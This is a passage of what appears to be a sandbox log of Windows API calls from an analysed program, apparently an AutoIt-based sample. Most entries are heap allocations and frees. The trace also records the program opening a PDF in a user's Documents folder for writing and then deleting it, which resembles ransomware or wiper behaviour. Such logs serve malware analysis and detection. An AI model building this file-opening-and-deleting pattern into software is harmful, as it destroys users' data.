[0035.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0035.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0035.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0035.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0035.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0035.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0035.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0035.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0035.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0035.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0035.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0035.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0035.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0035.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0035.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0035.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0035.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0035.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0035.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0035.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0035.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0035.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0035.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0035.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0035.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0035.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0035.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.181] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0035.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0035.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0035.181] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0035.181] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0035.181] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\s_uc9.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0035.181] FreeLibrary (hLibModule=0x76e10000) returned 1 [0035.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0035.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0035.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0035.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0035.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0035.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0035.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0035.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0035.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0035.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0035.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0035.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0035.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0035.182] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0035.182] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0035.182] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0035.182] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0035.182] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0035.182] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0035.182] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0035.182] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0035.182] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0035.182] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0035.182] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0035.182] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0035.182] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0035.182] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0035.182] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0035.182] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0035.182] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0035.182] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0035.182] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0035.182] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0035.182] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0035.182] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0035.182] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0035.182] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0035.182] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0035.182] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0035.182] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0035.182] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0035.182] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0035.182] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0035.182] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.182] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0035.183] FreeLibrary (hLibModule=0x76e10000) returned 1 [0035.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0035.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0035.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0035.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0035.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0035.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0035.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0035.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0035.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0035.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0035.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0035.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0035.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0035.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0035.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0035.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0035.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0035.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0035.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0035.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0035.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0035.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0035.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0035.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0035.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0035.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0035.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0035.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0035.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0035.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0035.184] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0035.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0035.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0035.184] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.184] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0035.184] FreeLibrary (hLibModule=0x76e10000) returned 1 [0035.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0035.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0035.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0035.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0035.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0035.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0035.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0035.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0035.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0035.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0035.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0035.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0035.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0035.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0035.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0035.185] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.185] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.185] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.185] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf", lpFilePart=0x0) returned 0x61 [0035.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0035.185] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6d177b70, ftCreationTime.dwHighDateTime=0x1d5b5f8, ftLastAccessTime.dwLowDateTime=0x3287bd80, ftLastAccessTime.dwHighDateTime=0x1d5c359, ftLastWriteTime.dwLowDateTime=0x14acc120, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x373c, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="s_Uc9.pdf", cAlternateFileName="")) returned 0x7c2100 [0035.185] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\s_uc9.pdf")) returned 1 [0035.187] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6d177b70, ftCreationTime.dwHighDateTime=0x1d5b5f8, ftLastAccessTime.dwLowDateTime=0x3287bd80, ftLastAccessTime.dwHighDateTime=0x1d5c359, ftLastWriteTime.dwLowDateTime=0x14acc120, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x373c, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="s_Uc9.pdf", cAlternateFileName="")) returned 0 [0035.187] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0035.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5758 | out: hHeap=0x770000) returned 1 [0035.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0035.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0035.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0035.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x791268 | out: hHeap=0x770000) returned 1 [0035.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0035.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0035.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0035.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0035.187] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0035.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0035.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0035.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0035.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0035.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0035.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0035.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0035.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0035.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0035.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0035.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0035.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0035.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0035.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0035.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac320 | out: hHeap=0x770000) returned 1 [0035.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0035.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0035.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0035.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0035.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0035.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0035.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0035.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0035.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0035.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0035.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0035.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0035.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0035.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0035.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0035.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0035.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0035.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0035.189] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.189] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0035.189] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0035.189] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0035.189] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0035.189] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0035.189] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0035.189] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0035.189] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0035.189] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0035.189] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0035.189] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0035.189] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0035.189] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0035.189] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0035.189] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0035.189] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0035.189] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0035.189] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0035.189] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0035.189] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0035.189] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0035.189] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af5a8 [0035.189] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0035.189] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0035.189] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0035.189] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0035.190] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0035.190] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c748 [0035.190] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0035.190] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0035.190] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0035.190] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0035.190] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0035.190] 